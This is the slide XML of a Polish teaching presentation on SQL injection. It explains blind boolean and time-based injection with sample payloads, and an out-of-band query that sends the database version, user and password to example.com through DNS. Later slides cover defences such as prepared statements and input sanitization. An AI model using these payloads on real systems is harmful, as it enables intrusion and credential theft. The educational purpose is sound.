              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>W wyniku zapytanie zwraca FALSE bez wyświetlania przedmiotów na liście. Atakujący następnie modyfikuje żądanie na:</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solidFill>
                  <a:srgbClr val="C9DAF8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.webshop.local/item.php?id=14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E6B8AF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and 1=1</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="E6B8AF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="E6B8AF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Baza danych zwróci TRUE, a szczegóły przedmiotu o identyfikatorze 14 zostaną wyświetlone. Jest to wskazówka, że ta strona internetowa jest podatna na atak.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="E6B8AF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Google Shape;407;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="72250"/>
            <a:ext cx="7705800" cy="67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Przykład</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50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1387000"/>
            <a:ext cx="7704000" cy="312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Metoda podobna do poprzedniej, z tym że tutaj napastnik zmusza bazę danych do „odczekania” pewnego czasu (zazwyczaj kilku sekund) przed wysłaniem odpowiedzi. Czas odpowiedzi sugeruje atakującemu, czy zapytanie zwróciło wynik PRAWDA, czy FAŁSZ. Taka metoda pozwala na przykład odgadnąć nazwę tablicy literka po literce, choć jest to czasochłonne.</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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Google Shape;413;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705800" cy="71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Inferential SQLi (Blind SQLi) - Time-based</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51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="751450"/>
            <a:ext cx="7704000" cy="447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W tym przypadku atakujący wykonuje operację, która zajmuje dużo czasu.</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Jeśli strona internetowa nie zwraca natychmiastowej odpowiedzi, oznacza to podatność na atak. Najbardziej popularną operacją wymagającą dużej ilości czasu jest operacja sleep.</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Atakujący zbadałby czas odpowiedzi serwera internetowego dla zwykłego zapytania SQL, a następnie wydałby poniższe żądanie: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solidFill>
                  <a:srgbClr val="C9DAF8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.webshop.local/item.php?id=14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E6B8AF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and if(1=1, sleep(15), false)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="E6B8AF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Strona internetowa jest podatna, jeśli odpowiedź zostanie opóźniona o 15 sekund.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Google Shape;419;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="72250"/>
            <a:ext cx="7705800" cy="67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Przykład</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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168542"/>
            <a:ext cx="7704000" cy="365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W tym rodzaju SQL injection haker nie korzysta z jednego kanału do przeprowadzenia ataku i uzyskania jego wyników. Zamiast tego zmusza aplikację do przesyłania odpowiedzi do innego punktu końcowego, który znajduje się pod jego kontrolą.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Google Shape;425;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Out-of-band SQLi</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53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="953575"/>
            <a:ext cx="7704000" cy="427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Załóżmy, że atakujący jest w stanie wykonać następujące zapytanie SQL w docelowej bazie danych:</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solidFill>
                  <a:srgbClr val="C9DAF8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT load_file(CONCAT('\\\\',(SELECT+@@version),'.',(SELECT+user),'.', (SELECT+password),'.',example.com\\test.txt'))</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="C9DAF8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>To spowoduje, że aplikacja wyśle żądanie DNS do domeny database_version.database_user.database_password.example.com, ujawniając wrażliwe dane (wersję bazy danych, nazwę użytkownika oraz hasło użytkownika) atakującemu.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Google Shape;431;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="72250"/>
            <a:ext cx="7705800" cy="67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Przykład</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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="235">
            <a:off x="2382150" y="4406650"/>
            <a:ext cx="4379700" cy="529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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Karla"/>
                <a:ea typeface="Karla"/>
                <a:cs typeface="Karla"/>
                <a:sym typeface="Karla"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=2OPVViV-GQk</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Karla"/>
              <a:ea typeface="Karla"/>
              <a:cs typeface="Karla"/>
              <a:sym typeface="Karla"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Karla"/>
                <a:ea typeface="Karla"/>
                <a:cs typeface="Karla"/>
                <a:sym typeface="Karla"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://demo.testfire.net/index.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Karla"/>
                <a:ea typeface="Karla"/>
                <a:cs typeface="Karla"/>
                <a:sym typeface="Karla"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Karla"/>
              <a:ea typeface="Karla"/>
              <a:cs typeface="Karla"/>
              <a:sym typeface="Karla"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Is your password for sale on the Dark Web? Find out now with Dashlane: https://www.dashlane.com/networkchuck50 (Use code networkchuck50 to get 50% off) &#10;&#10;In this video, we’re learning one of the oldest, yet most dangerous Hacking Techniques out there, SQL Injection. Despite SQL Injections being over 20 years old, they still rank number 3 on the OWASP Top 10 List….why? Even fortune 500 companies are still vulnerable to these attacks!! So, in this video, NetworkChuck will show you how to run an SQL Injection attack. Running a basic SQL Injection attack is pretty easy but will often become more complex with trickier targets. &#10;&#10;Stuff from the Video&#10;---------------------------------------------------&#10;TARGET SITE (Altoro Mutual): https://demo.testfire.net/index.jsp&#10;MORE practice: https://play.picoctf.org/practice/challenge/304?page=1&amp;search=sqli&#10;How to protect against SQL Injection attacks: https://www.crowdstrike.com/cybersecurity-101/sql-injection/&#10;&#10;&#10;🔥🔥Join Hackwell Academy: https://ntck.co/NCAcademy&#10;&#10;&#10;&#10;**Sponsored by Dashlane &#10;&#10;&#10;&#10;&#10;&#10;&#10;&#10;SUPPORT NETWORKCHUCK&#10;---------------------------------------------------&#10;➡️NetworkChuck membership: https://ntck.co/Premium&#10;☕☕ COFFEE and MERCH: https://ntck.co/coffee&#10;&#10;Check out my new channel: https://ntck.co/ncclips&#10;&#10;🆘🆘NEED HELP?? Join the Discord Server: https://discord.gg/networkchuck&#10;&#10;STUDY WITH ME on Twitch: https://bit.ly/nc_twitch&#10;&#10;READY TO LEARN??&#10;---------------------------------------------------&#10;-Learn Python: https://bit.ly/3rzZjzz&#10;-Get your CCNA: https://bit.ly/nc-ccna&#10;&#10;FOLLOW ME EVERYWHERE&#10;---------------------------------------------------&#10;Instagram: https://www.instagram.com/networkchuck/&#10;Twitter: https://twitter.com/networkchuck&#10;Facebook: https://www.facebook.com/NetworkChuck/&#10;Join the Discord server: http://bit.ly/nc-discord&#10;&#10;0:00   ⏩  Intro&#10;0:39   ⏩  Sponsor - Dashlane&#10;1:43   ⏩  How Websites work with Databases&#10;2:08   ⏩  What is a SQL Injection??&#10;2:51   ⏩  Strings in SQL Queries&#10;3:25   ⏩  Is a website vulnerable to SQL Injection?&#10;4:14   ⏩  SQL Query Logic&#10;4:45   ⏩  the OR SQL Injection Payload&#10;7:13   ⏩  the COMMENT SQL Injection Payload&#10;8:42   ⏩  how to protect against SQL Injections&#10;&#10;&#10;&#10;&#10;AFFILIATES &amp; REFERRALS&#10;---------------------------------------------------&#10;(GEAR I USE...STUFF I RECOMMEND)&#10;My network gear: https://geni.us/L6wyIUj&#10;Amazon Affiliate Store: https://www.amazon.com/shop/networkchuck&#10;Buy a Raspberry Pi: https://geni.us/aBeqAL&#10;Do you want to know how I draw on the screen?? Go to https://ntck.co/EpicPen and use code NetworkChuck to get 20% off!! &#10;&#10;&#10;&#10;#sqlinjection #owasptop10 #sqli" id="437" name="Google Shape;437;p54" title="SQL Injections are scary!! (hacking tutorial for beginners)">
            <a:hlinkClick r:id="rId5"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1612375" y="906950"/>
            <a:ext cx="5919250" cy="33295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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701100" y="1663950"/>
            <a:ext cx="7741800" cy="181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500"/>
              <a:t>Ochrona przed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5500"/>
              <a:t> SQL Injection</a:t>
            </a:r>
            <a:endParaRPr sz="5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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168527"/>
            <a:ext cx="7704000" cy="296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Baza danych to uporządkowany zbiór informacji zapisanych zgodnie z określonymi regułami. W węższym znaczeniu obejmuje dane cyfrowe gromadzone zgodnie z zasadami przyjętymi dla danego programu komputerowego specjalizowanego w gromadzeniu i przetwarzaniu tych danych.</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Baza danych</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56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Segregacja danych</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Google Shape;448;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168537"/>
            <a:ext cx="7704000" cy="341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W przypadku baz danych, podobnie jak w przypadku pieniędzy, zaleca się rozproszenie zasobów. Unikaj trzymania wszystkich danych w jednym miejscu. Ataki SQLi mogą spowodować ogromne szkody, ale ich wpływ będzie mniejszy, jeśli haker uzyska dostęp jedynie do określonych informacji, np. dotyczących produktów, zamiast danych osobowych klientów czy kontrahentów. Dlatego ważne jest dążenie do decentralizacji danych i unikanie ich przechowywania w jednej bazie.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168537"/>
            <a:ext cx="77040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Rzutowanie (konwersja) danych to przekształcanie ich w docelowy format. Nigdy nie można polegać na użytkownikach aplikacji, że wprowadzą poprawne dane. Dlatego tworząc formularz, przyjmujący wartość tekstową, należy być przygotowanym na to, że użytkownik może próbować wpisać tam inne typy danych, na przykład liczby. Konwersja pozwala na zmianę danych wejściowych na odpowiedni format i zapobiega niektórym formom ataków SQL injection.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Rzutowanie danych</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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1473701"/>
            <a:ext cx="7704000" cy="309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Korzystanie z prepared statements polega na budowaniu zapytań SQL z wcześniej przygotowanych części, zamiast generować je dynamicznie na bieżąco. Aplikacja wstawia zmienne użytkownika, takie jak loginy czy frazy wyszukiwania, dopiero w późniejszym etapie. Ta metoda zapobiega większości ataków SQL injection, ale może mieć negatywny wpływ na wydajność aplikacji.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Google Shape;460;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Prepared statements, czyli gotowe zapytania</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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1473701"/>
            <a:ext cx="7704000" cy="309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Sanityzacja danych wejściowych to kluczowy element w zabezpieczeniu aplikacji webowej. Polega na określeniu listy zaakceptowanych fraz i znaków, które mogą być użyte w formularzach. Jeśli użytkownik próbuje wprowadzić coś spoza tej listy, np. polecenie SQL, system automatycznie odrzuca te dane.</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Google Shape;466;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Sprawdzanie poprawności danych wejściowych (sanityzacja)</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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508250" y="1506750"/>
            <a:ext cx="6127500" cy="213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Dziękujemy za uwagę</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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168535"/>
            <a:ext cx="7704000" cy="332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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://pl.wikipedia.org/wiki/SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://nordvpn.com/pl/blog/sql-injection-co-to/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://ochronasieci.pl/zagrozenia-w-sieci/sql-injection/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://hackeru.pl/sql-injection/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://brightsec.com/blog/sql-injection-attack/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://www.invicti.com/learn/out-of-band-sql-injection-oob-sqli/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>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A. Klekot, T. Klekot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Programowanie i tworzenie stron internetowych oraz baz danych i administrowanie nimi. Kwalifikacja EE.09. Część 3</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Google Shape;477;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Źródła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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1517051"/>
            <a:ext cx="3368700" cy="307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Jest to rodzaj bazy danych, która przechowuje i zarządza danymi za pomocą tabel i relacji między nimi.</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Google Shape;294;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Relacyjna b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>aza danych</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="295" name="Google Shape;295;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4643075" y="1517050"/>
            <a:ext cx="3780875" cy="3300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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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SQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;301;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459925" y="1525850"/>
            <a:ext cx="4112100" cy="322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Język </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2200"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t> (ang. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2200"/>
              <a:t>Structured Query Language</a:t>
            </a:r>
